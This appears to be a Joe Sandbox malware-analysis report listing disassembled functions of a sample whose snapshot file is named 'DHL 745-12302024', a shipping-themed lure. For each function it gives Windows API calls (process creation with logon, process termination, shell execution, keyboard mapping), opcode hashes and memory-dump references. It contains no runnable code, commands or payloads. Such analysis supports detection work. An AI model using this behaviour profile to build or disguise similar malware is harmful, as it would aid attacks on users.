Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00AD94E5
_wcslen.LIBCMT ref: 00AD9506
_wcslen.LIBCMT ref: 00AD952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00AD9585

Strings

X, xrefs: 00AD9412

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: ae23e80992dd20570bfb7f53929316b3ab81581a5e2614ab9ada33359f10d8cb
Instruction ID: b4c54237f874dce5f23976d007bd3a75f13e9a26bf6114da26a00c2b528f8732
Opcode Fuzzy Hash: ae23e80992dd20570bfb7f53929316b3ab81581a5e2614ab9ada33359f10d8cb
Instruction Fuzzy Hash: 8BE16F716043019FD724EF24C981A6BB7F4BF85314F14896DE89A9B3A2DB31DD05CB92

Function 00A7920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

BeginPaint.USER32(?,?,?), ref: 00A79241
GetWindowRect.USER32(?,?), ref: 00A792A5
ScreenToClient.USER32(?,?), ref: 00A792C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A792D3
EndPaint.USER32(?,?,?,?,?), ref: 00A79321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AB71EA

Part of subcall function 00A79339: BeginPath.GDI32(00000000), ref: 00A79357

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 7c9d1c4b031064e8199ac4fa10620cbf81f70829e7ab16b3e78b33aa628f3f24
Instruction ID: 874d5591447d572f8445298dd93ad0d192cdec01191006cdff9517329a185df5
Opcode Fuzzy Hash: 7c9d1c4b031064e8199ac4fa10620cbf81f70829e7ab16b3e78b33aa628f3f24
Instruction Fuzzy Hash: 9941B231104200AFD711DF69DC84FBB7BBCEB85320F14866AF9698B2B2C7719846DB61

Function 00AD07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00AD080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00AD0847
EnterCriticalSection.KERNEL32(?), ref: 00AD0863
LeaveCriticalSection.KERNEL32(?), ref: 00AD08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00AD08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AD0921

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: ea558c3099af2a334f623e4bf11614f29d39612076dfc3ea7334f9b57862ad04
Instruction ID: 5ae702a2cba5b5834bbef1211477022e0044435943c7408c828335f1650cf9fe
Opcode Fuzzy Hash: ea558c3099af2a334f623e4bf11614f29d39612076dfc3ea7334f9b57862ad04
Instruction Fuzzy Hash: 8D416A71900205EFDF14EF94DD85AAAB7B8FF04310F1480A5ED059A296DB30DE65DBA4

Function 00AD581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A63AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A63A97,?,?,00A62E7F,?,?,?,00000000), ref: 00A63AC2

_wcslen.LIBCMT ref: 00AD587B
CoInitialize.OLE32(00000000), ref: 00AD5995
CoCreateInstance.OLE32(00AFFCF8,00000000,00000001,00AFFB68,?), ref: 00AD59AE
CoUninitialize.OLE32 ref: 00AD59CC

Strings

.lnk, xrefs: 00AD5876, 00AD58C1, 00AD5985

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 0e8e10cdf2127f62aaf8a728abd4feb6b2d4a66e34afd22eb101492156f0d228
Instruction ID: 8074840db0d27ed981602f25be89609430fb5460572f508753be8d8ba6d40422
Opcode Fuzzy Hash: 0e8e10cdf2127f62aaf8a728abd4feb6b2d4a66e34afd22eb101492156f0d228
Instruction Fuzzy Hash: 0DD14371A087019FC714DF24C594A2ABBF5EF89724F14885AF88A9B361DB31EC45CB92

Function 00AC175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AC0FCA
Part of subcall function 00AC0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AC0FD6
Part of subcall function 00AC0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AC0FE5
Part of subcall function 00AC0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AC0FEC
Part of subcall function 00AC0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AC1002

GetLengthSid.ADVAPI32(?,00000000,00AC1335), ref: 00AC17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AC17BA
HeapAlloc.KERNEL32(00000000), ref: 00AC17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AC17DA
GetProcessHeap.KERNEL32(00000000,00000000,00AC1335), ref: 00AC17EE
HeapFree.KERNEL32(00000000), ref: 00AC17F5

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f0ef1593e46e77ab2d79e45ca6546a5a42a9c7991271c79024136598acd2bd4b
Instruction ID: b33011680cdc8db7650911e23fef2d385bc54ce03cd0c1ee90ef283a3c7dbae2
Opcode Fuzzy Hash: f0ef1593e46e77ab2d79e45ca6546a5a42a9c7991271c79024136598acd2bd4b
Instruction Fuzzy Hash: 82118632600209EFDB20DBE5CD49FAE7BA9EF42365F11411CE481A7212D736A956CB60

Function 00AC14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AC14FF
OpenProcessToken.ADVAPI32(00000000), ref: 00AC1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AC1515
CloseHandle.KERNEL32(00000004), ref: 00AC1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AC154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00AC1563

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: b7d33f781740ce9862d7e03b3ece3d31a622e1a1a5f119e5d55e49f0c79f130e
Instruction ID: 9a28b38b601e19c6a89d4ab3b797ac329dbfc48e6c5a854f7def0dfa452ae5e8
Opcode Fuzzy Hash: b7d33f781740ce9862d7e03b3ece3d31a622e1a1a5f119e5d55e49f0c79f130e
Instruction Fuzzy Hash: D6115C7260020DABDF11CFD4DE49FEE7BA9EF49754F054018FA05A2160C3758E65EB60

Function 00A83382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A83379,00A82FE5), ref: 00A83390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A8339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A833B7
SetLastError.KERNEL32(00000000,?,00A83379,00A82FE5), ref: 00A83409

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2501cab4b5764c7a0edd734399a285a1113f932693f7b5164b0c4fe655597359
Instruction ID: 4d49bd342606898cc1e1692b7aaab21b47d1500ab2fb8ba8414e4d27d3688371
Opcode Fuzzy Hash: 2501cab4b5764c7a0edd734399a285a1113f932693f7b5164b0c4fe655597359
Instruction Fuzzy Hash: AA01D433609311BEEF263BB9BD85A6B2E94EB05B797200339F4108A1F1EF114E039784

Function 00A92D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A95686,00AA3CD6,?,00000000,?,00A95B6A,?,?,?,?,?,00A8E6D1,?,00B28A48), ref: 00A92D78
_free.LIBCMT ref: 00A92DAB
_free.LIBCMT ref: 00A92DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00A8E6D1,?,00B28A48,00000010,00A64F4A,?,?,00000000,00AA3CD6), ref: 00A92DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00A8E6D1,?,00B28A48,00000010,00A64F4A,?,?,00000000,00AA3CD6), ref: 00A92DEC
_abort.LIBCMT ref: 00A92DF2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2b8ce340d08762890d3c97ed89f3029f743dfaa892b63673d05a20f9ddd6bc5d
Instruction ID: 5f3faa49935969a12a6028a52e78830fdcf9f272f1eef60c7c66615297c34b0a
Opcode Fuzzy Hash: 2b8ce340d08762890d3c97ed89f3029f743dfaa892b63673d05a20f9ddd6bc5d
Instruction Fuzzy Hash: 87F0C83674560037DE22B775BE06F6F25E9AFD17F1F254519F824E61D2EE24880243A0

Function 00AF8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A79639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A79693
Part of subcall function 00A79639: SelectObject.GDI32(?,00000000), ref: 00A796A2
Part of subcall function 00A79639: BeginPath.GDI32(?), ref: 00A796B9
Part of subcall function 00A79639: SelectObject.GDI32(?,00000000), ref: 00A796E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AF8A4E
LineTo.GDI32(?,00000003,00000000), ref: 00AF8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AF8A70
LineTo.GDI32(?,00000000,00000003), ref: 00AF8A80
EndPath.GDI32(?), ref: 00AF8A90
StrokePath.GDI32(?), ref: 00AF8AA0

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 245b5b0036e9ea40542c81f74697adcfed438090476c8c38a2b063ec3a0278ed
Instruction ID: cf94214ee304c02424a48c78bd3a86952f66a86c0f92dcca02a17ab7311c1b2a
Opcode Fuzzy Hash: 245b5b0036e9ea40542c81f74697adcfed438090476c8c38a2b063ec3a0278ed
Instruction Fuzzy Hash: 42110C7600010DFFDB119FD5DD48EAA7F6CEB04364F008112BA1996161CB719D56DB60

Function 00AC51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AC5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00AC5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AC5230
ReleaseDC.USER32(00000000,00000000), ref: 00AC5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AC524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00AC5261

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 451e1ae228812cd422e7c3ad1a30be5f73c4cac075578c20642444081dd024f1
Instruction ID: 69244c6737585e605db59a8a12401a65cb1289c1ddc0ecba96ef298597fa7bff
Opcode Fuzzy Hash: 451e1ae228812cd422e7c3ad1a30be5f73c4cac075578c20642444081dd024f1
Instruction Fuzzy Hash: 87012C75E04618BBEB109BF69D49F9EBFA8EF48761F044065FA04E7281DA709905CBA0

Function 00A61BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A61BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A61BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A61C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A61C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A61C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A61C22

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3a418c546e4582516dccff2d25567350e770ce8a0cd5e6f9a1af2277e5ab82ef
Instruction ID: 0858b7ec24208f36791056db2f9e5847d1483f8d792f85e0317b81a21ce3913b
Opcode Fuzzy Hash: 3a418c546e4582516dccff2d25567350e770ce8a0cd5e6f9a1af2277e5ab82ef
Instruction Fuzzy Hash: 6D016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 00ACEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ACEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ACEB46
GetWindowThreadProcessId.USER32(?,?), ref: 00ACEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACEB75

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: eb0e76a7f5156e775630e9c943991a3fed2226ad762ec5f75976447d76568d6c
Instruction ID: aeba630241e70f8a415163ff2692c6af2dd5bcd13c3f1dcdb79b67f59eaf450a
Opcode Fuzzy Hash: eb0e76a7f5156e775630e9c943991a3fed2226ad762ec5f75976447d76568d6c
Instruction Fuzzy Hash: 01F01772240158BBE7219BE39D0EEFB7A7CEFCAB61F004258F601D50919BA45A02D6B5

Function 00AC1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AC187F
UnloadUserProfile.USERENV(?,?), ref: 00AC188B
CloseHandle.KERNEL32(?), ref: 00AC1894
CloseHandle.KERNEL32(?), ref: 00AC189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00AC18A5
HeapFree.KERNEL32(00000000), ref: 00AC18AC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f3a3bb0e3713e32c57209b2e514306b62885a1cb17f402bc7504eaf8502a3a09
Instruction ID: 595139bbd60864d5dce90c531f7cbffb2c09d2bd3099dce4b6ad2ea61f8d1dd3
Opcode Fuzzy Hash: f3a3bb0e3713e32c57209b2e514306b62885a1cb17f402bc7504eaf8502a3a09
Instruction Fuzzy Hash: 2EE0C236004109BBDA01ABE2EE0CD1ABF29FF49B72B108220F22585070CB329432EB54

Function 00ACC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A67620: _wcslen.LIBCMT ref: 00A67625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ACC6EE
_wcslen.LIBCMT ref: 00ACC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ACC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ACC7CA

Strings

0, xrefs: 00ACC6AF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 32293ed31bcf9413eda690a100113535abe4cb693a010ff772defca36d66033f
Instruction ID: 83e4f3264f72b1456b2e5240146f1d12e5154f1a88be64515b31b731613ea452
Opcode Fuzzy Hash: 32293ed31bcf9413eda690a100113535abe4cb693a010ff772defca36d66033f
Instruction Fuzzy Hash: 6351CB726183009BD714DF28CA85F6BB7E8EF89324F054A2DF999E71A1DB70D904CB52

Function 00AEAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00AEAEA3

Part of subcall function 00A67620: _wcslen.LIBCMT ref: 00A67625

GetProcessId.KERNEL32(00000000), ref: 00AEAF38
CloseHandle.KERNEL32(00000000), ref: 00AEAF67

Strings

<, xrefs: 00AEAE6B
@, xrefs: 00AEAE72

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 7dd634b3931259836ee61d364a5680b9972515a0d434a80feaaabb5c25cac24d
Instruction ID: 1f6b03ece572357c3d62ae7355d1a83c22bac7211e339b541f71bcea846a7557
Opcode Fuzzy Hash: 7dd634b3931259836ee61d364a5680b9972515a0d434a80feaaabb5c25cac24d
Instruction Fuzzy Hash: CD71AC71A00258DFCB14DF95C584A9EBBF0FF08314F048499E81AAB3A2CB74ED45CB91

Function 00AF6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(012E0790,?), ref: 00AF62E2
ScreenToClient.USER32(?,?), ref: 00AF6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AF6382

Strings

@U=u, xrefs: 00AF63DD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: 20bce5fb1908001496069a600c668ee004d2c6edfb822b0cfd1ed1aca21e1b92
